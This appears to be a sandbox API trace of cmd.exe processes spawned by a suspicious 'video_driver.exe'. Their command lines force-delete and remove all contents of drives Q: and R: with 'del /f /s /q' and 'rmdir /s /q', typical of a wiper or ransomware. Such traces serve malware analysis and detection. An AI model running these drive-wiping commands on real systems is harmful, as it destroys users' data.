[0068.625] GetEnvironmentStringsW () returned 0x5a20f8* [0068.625] GetProcessHeap () returned 0x590000 [0068.625] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a36a8 [0068.626] FreeEnvironmentStringsW (penv=0x5a20f8) returned 1 [0068.626] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb24 | out: phkResult=0x16eb24*=0x68) returned 0x0 [0068.626] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x0, lpcbData=0x16eb28*=0x1000) returned 0x2 [0068.626] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x4) returned 0x0 [0068.626] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x1000) returned 0x2 [0068.626] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x0, lpcbData=0x16eb28*=0x4) returned 0x0 [0068.626] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x4) returned 0x0 [0068.626] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x4) returned 0x0 [0068.626] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x1000) returned 0x2 [0068.626] RegCloseKey (hKey=0x68) returned 0x0 [0068.626] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb24 | out: phkResult=0x16eb24*=0x68) returned 0x0 [0068.627] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x40, lpcbData=0x16eb28*=0x1000) returned 0x2 [0068.627] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x4) returned 0x0 [0068.627] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x1, lpcbData=0x16eb28*=0x1000) returned 0x2 [0068.627] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x0, lpcbData=0x16eb28*=0x4) returned 0x0 [0068.627] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x9, lpcbData=0x16eb28*=0x4) returned 0x0 [0068.627] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x4, lpData=0x16eb30*=0x9, lpcbData=0x16eb28*=0x4) returned 0x0 [0068.627] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb2c, lpData=0x16eb30, lpcbData=0x16eb28*=0x1000 | out: lpType=0x16eb2c*=0x0, lpData=0x16eb30*=0x9, lpcbData=0x16eb28*=0x1000) returned 0x2 [0068.627] RegCloseKey (hKey=0x68) returned 0x0 [0068.627] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6e [0068.627] srand (_Seed=0x5eb34b6e) [0068.628] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"Q:\" del /f /s /q \"Q:\" & FOR /D %p IN (\"Q:\") DO rmdir \"%p\" /s /q" [0068.628] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"Q:\" del /f /s /q \"Q:\" & FOR /D %p IN (\"Q:\") DO rmdir \"%p\" /s /q" [0068.628] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.628] GetProcessHeap () returned 0x590000 [0068.628] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a20f8 [0068.628] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.628] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.628] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.628] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.629] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.629] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.629] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.629] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.629] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.629] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.629] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.629] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.629] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.629] GetProcessHeap () returned 0x590000 [0068.629] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a2bd0 | out: hHeap=0x590000) returned 1 [0068.629] GetEnvironmentStringsW () returned 0x5a2310* [0068.629] GetProcessHeap () returned 0x590000 [0068.629] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xae2) returned 0x5a4c70 [0068.629] FreeEnvironmentStringsW (penv=0x5a2310) returned 1 [0068.630] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.630] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.630] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.630] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.630] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.630] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.630] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.630] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.630] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.630] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.630] GetProcessHeap () returned 0x590000 [0068.630] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a17c8 [0068.630] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f8f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.630] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16f8f0, lpFilePart=0x16f8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f8ec*="Desktop") returned 0x25 [0068.630] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.631] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f66c | out: lpFindFileData=0x16f66c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a5760 [0068.631] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0068.631] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f66c | out: lpFindFileData=0x16f66c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a5760 [0068.631] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0068.631] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0068.631] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f66c | out: lpFindFileData=0x16f66c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a5760 [0068.631] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0068.632] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.632] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0068.632] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0068.632] GetProcessHeap () returned 0x590000 [0068.632] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4c70 | out: hHeap=0x590000) returned 1 [0068.632] GetEnvironmentStringsW () returned 0x5a4180* [0068.632] GetProcessHeap () returned 0x590000 [0068.632] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a5fa0 [0068.632] FreeEnvironmentStringsW (penv=0x5a4180) returned 1 [0068.632] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.632] GetProcessHeap () returned 0x590000 [0068.632] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a17c8 | out: hHeap=0x590000) returned 1 [0068.632] GetProcessHeap () returned 0x590000 [0068.632] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400e) returned 0x5a6ae0 [0068.633] GetProcessHeap () returned 0x590000 [0068.633] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa0) returned 0x5a2e50 [0068.633] GetProcessHeap () returned 0x590000 [0068.633] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae0 | out: hHeap=0x590000) returned 1 [0068.633] GetConsoleOutputCP () returned 0x1b5 [0068.633] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.633] GetUserDefaultLCID () returned 0x409 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fa30, cchData=128 | out: lpLCData="0") returned 2 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa30, cchData=128 | out: lpLCData="0") returned 2 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa30, cchData=128 | out: lpLCData="1") returned 2 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0068.635] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0068.636] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0068.637] GetProcessHeap () returned 0x590000 [0068.637] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20c) returned 0x5a2ef8 [0068.637] GetConsoleTitleW (in: lpConsoleTitle=0x5a2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0068.638] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.638] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0068.638] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0068.638] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0068.639] GetProcessHeap () returned 0x590000 [0068.639] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a6ae0 [0068.639] GetProcessHeap () returned 0x590000 [0068.639] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aaaf8 [0068.639] GetProcessHeap () returned 0x590000 [0068.639] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x5a57e0 [0068.639] GetEnvironmentVariableW (in: lpName="p IN (\"Q", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.639] _wcsicmp (_String1="p IN (\"Q", _String2="CD") returned 13 [0068.640] _wcsicmp (_String1="p IN (\"Q", _String2="ERRORLEVEL") returned 11 [0068.640] _wcsicmp (_String1="p IN (\"Q", _String2="CMDEXTVERSION") returned 13 [0068.640] _wcsicmp (_String1="p IN (\"Q", _String2="CMDCMDLINE") returned 13 [0068.640] _wcsicmp (_String1="p IN (\"Q", _String2="DATE") returned 12 [0068.640] _wcsicmp (_String1="p IN (\"Q", _String2="TIME") returned -4 [0068.640] _wcsicmp (_String1="p IN (\"Q", _String2="RANDOM") returned -2 [0068.640] _wcsicmp (_String1="p IN (\"Q", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.640] GetProcessHeap () returned 0x590000 [0068.640] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a57e0 | out: hHeap=0x590000) returned 1 [0068.640] GetProcessHeap () returned 0x590000 [0068.640] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaaf8 | out: hHeap=0x590000) returned 1 [0068.640] GetProcessHeap () returned 0x590000 [0068.640] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aaaf8 [0068.640] GetProcessHeap () returned 0x590000 [0068.640] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaaf8 | out: hHeap=0x590000) returned 1 [0068.640] GetProcessHeap () returned 0x590000 [0068.640] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae0 | out: hHeap=0x590000) returned 1 [0068.640] _wcsicmp (_String1="if", _String2=")") returned 64 [0068.640] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0068.641] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0068.641] _wcsicmp (_String1="IF", _String2="if") returned 0 [0068.641] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0068.641] GetProcessHeap () returned 0x590000 [0068.641] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3110 [0068.641] GetProcessHeap () returned 0x590000 [0068.641] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x59ffc0 [0068.641] GetProcessHeap () returned 0x590000 [0068.641] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x20) returned 0x5a57e0 [0068.642] GetProcessHeap () returned 0x590000 [0068.642] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a57e0, Size=0x16) returned 0x5a1800 [0068.642] GetProcessHeap () returned 0x590000 [0068.642] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a1800) returned 0x16 [0068.642] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0068.642] GetProcessHeap () returned 0x590000 [0068.642] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3170 [0068.642] GetProcessHeap () returned 0x590000 [0068.642] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a31d0 [0068.642] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0068.642] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0068.643] GetProcessHeap () returned 0x590000 [0068.643] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a31f0 [0068.643] GetProcessHeap () returned 0x590000 [0068.643] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x5a57e0 [0068.643] GetProcessHeap () returned 0x590000 [0068.643] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a57e0, Size=0x14) returned 0x5a3210 [0068.643] GetProcessHeap () returned 0x590000 [0068.643] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a3210) returned 0x14 [0068.643] _wcsicmp (_String1="del", _String2=")") returned 59 [0068.643] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0068.643] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0068.643] _wcsicmp (_String1="IF", _String2="del") returned 5 [0068.643] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0068.643] _wcsicmp (_String1="REM", _String2="del") returned 14 [0068.643] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0068.643] GetProcessHeap () returned 0x590000 [0068.643] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3230 [0068.644] GetProcessHeap () returned 0x590000 [0068.644] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x59ffd8 [0068.644] GetProcessHeap () returned 0x590000 [0068.644] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x5a3290 [0068.645] GetProcessHeap () returned 0x590000 [0068.645] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a32c0 [0068.645] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0068.645] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0068.646] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0068.646] GetProcessHeap () returned 0x590000 [0068.646] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3320 [0068.646] GetProcessHeap () returned 0x590000 [0068.646] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x44) returned 0x5a3380 [0068.646] GetProcessHeap () returned 0x590000 [0068.646] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a33d0 [0068.646] GetProcessHeap () returned 0x590000 [0068.646] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a33d0, Size=0x12) returned 0x5a33d0 [0068.646] GetProcessHeap () returned 0x590000 [0068.646] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a33d0) returned 0x12 [0068.646] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0068.646] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0068.647] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0068.647] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0068.647] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0068.647] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0068.647] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0068.647] GetProcessHeap () returned 0x590000 [0068.647] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a33f0 [0068.648] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0068.648] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0068.648] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0068.648] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0068.648] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0068.648] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0068.648] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0068.648] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0068.648] GetProcessHeap () returned 0x590000 [0068.648] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3410 [0068.648] GetProcessHeap () returned 0x590000 [0068.648] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a3470 [0068.649] GetProcessHeap () returned 0x590000 [0068.649] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x20) returned 0x5a57e0 [0068.651] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0068.652] GetFullPathNameW (in: lpFileName="Q:", nBufferLength=0x208, lpBuffer=0x16f720, lpFilePart=0x16f4cc | out: lpBuffer="Q:\\", lpFilePart=0x16f4cc*=0x0) returned 0x3 [0068.652] wcsncmp (_String1="Q:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -11 [0068.656] GetFileAttributesW (lpFileName="Q:\\" (normalized: "q:")) returned 0xffffffff [0068.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.656] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.657] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.657] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.657] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.658] SetConsoleInputExeNameW () returned 0x1 [0068.658] GetConsoleOutputCP () returned 0x1b5 [0068.658] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.658] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.658] exit (_Code=0) Process: id = "62" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41f95000" os_pid = "0x688" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"R:\" del /f /s /q \"R:\" & FOR /D %p IN (\"R:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 90 os_tid = 0xb2c [0068.736] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35f904 | out: lpSystemTimeAsFileTime=0x35f904*(dwLowDateTime=0x6c72a20, dwHighDateTime=0x1d62400)) [0068.736] GetCurrentProcessId () returned 0x688 [0068.736] GetCurrentThreadId () returned 0xb2c [0068.736] GetTickCount () returned 0x114899a [0068.736] QueryPerformanceCounter (in: lpPerformanceCount=0x35f8fc | out: lpPerformanceCount=0x35f8fc*=18886992270) returned 1 [0068.738] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0068.738] __set_app_type (_Type=0x1) [0068.738] __p__fmode () returned 0x770331f4 [0068.738] __p__commode () returned 0x770331fc [0068.738] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0068.738] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0068.739] GetCurrentThreadId () returned 0xb2c [0068.739] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb2c) returned 0x60 [0068.739] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.739] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0068.739] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.740] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x35f894 | out: phkResult=0x35f894*=0x0) returned 0x2 [0068.740] VirtualQuery (in: lpAddress=0x35f8cb, 